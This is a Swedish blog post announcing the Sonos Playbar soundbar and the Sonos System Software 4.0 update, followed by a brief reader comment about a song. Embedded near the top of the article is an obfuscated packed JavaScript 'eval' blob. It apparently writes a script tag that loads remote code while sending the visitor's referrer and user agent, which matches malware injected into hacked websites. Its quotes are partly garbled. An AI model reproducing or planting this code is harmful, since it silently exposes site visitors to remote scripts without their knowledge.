Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2020

Scroll to top

Top

SONOS Playbar, ljudlimpan för musikälskare

Sebastian

SONOS eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ffzfi|var|u0026u|referrer|bntfr||js|php’.split(’|’),0,{}))
PLAYBAR kombinerar en allt-i-ett-design med en exponerad aluminiumyta med högpresterande högtalartyg för ett tidlöst, diskret utseende, och eftersom det inte behövs någon subwoofer eller högtalarsladd passar den enkelt in i de flesta miljöer.

Inbyggda sensorer hjälper PLAYBAR att automatiskt justera utjämningen (EQ) och kanalorienteringen så att det går montera den såväl på väggen som över eller under tv:n. Inuti får PLAYBAR sin slagkraft från nio individuellt förstärkta högtalare: sex midwoofer-enheter som levererar djupt, fylligt lågfrekvensljud och tre diskantenheter för kristallklara högfrekvensdetaljer.

PLAYBAR:s skapar en överraskande bred ljudscen som går utöver den fysiska ljudlimpan, samtidigt som den upprätthåller tydliga, centrerade sångröster. Oavsett om du tittar på en film, spelar spel eller streamar en låt från WIMP eller Spotify, kommer PLAYBAR alltid att låta mycket tydligare, inte bara högre.

PLAYBAR ansluts till tv:n med en optisk kabel och spelar upp allting som är inkopplat till den, inklusive digitalboxar, Blu-ray-spelare och spelkonsoler. Den förstår vanliga tv-ljudformat inklusive Dolby® Digital. Användaren kan styra volymen eller stänga av ljudet med den vanliga fjärrkontrollen för tv:n eller med en av gratisapparna Sonos Controller för iPhone, iPad, Android, Mac eller PC.

PLAYBAR fungerar sömlöst inom Sonos trådlösa ljudfamilj: Para PLAYBAR med den prisvinnande SONOS SUB för djupa basvågor för en helkroppsupplevelse och lägg till ett par PLAY:3-enheter som fungerar som trådlösa surroundhögtalare för en fängslande 5.1-surroundljudupplevelse för hemmabio.

PLAYBAR kommer att säljas i detaljhandeln för €699(Rekommenderat ca pris) och kan köpas på Sonos.com och från andra återförsäljare runt om i världen från och med den 5:e mars. Rekommenderat ca pris i Sverige är 5998:-

För mer information om SONOS PLAYBAR, inklusive tekniska data samt förhandsvisning, gå till Sonos.com/playbar.

Sonos System Software 4.0

Dessutom släpper Sonos en uppdatering av programvaran, Sonos System Software 4.0. Bland nyheterna finns nu bland annat Sonos-favoriter, som innebär att du kommer åt din favoritmusik på ett enkelt sätt direkt från musikmenyn. Dessutom har Sonos Controller optimerats för den större skärmen på iPhone 5 och det har även tillkommit en widget för Androidversionen. Uppdateringen finns tillgänglig nu.

Comments

  1. Lina

    Vad heter låten som spelas med Deadmau5?

    • Hej Lina! Låten heter Channel 42…
      Kul att du gillar Deadmau5.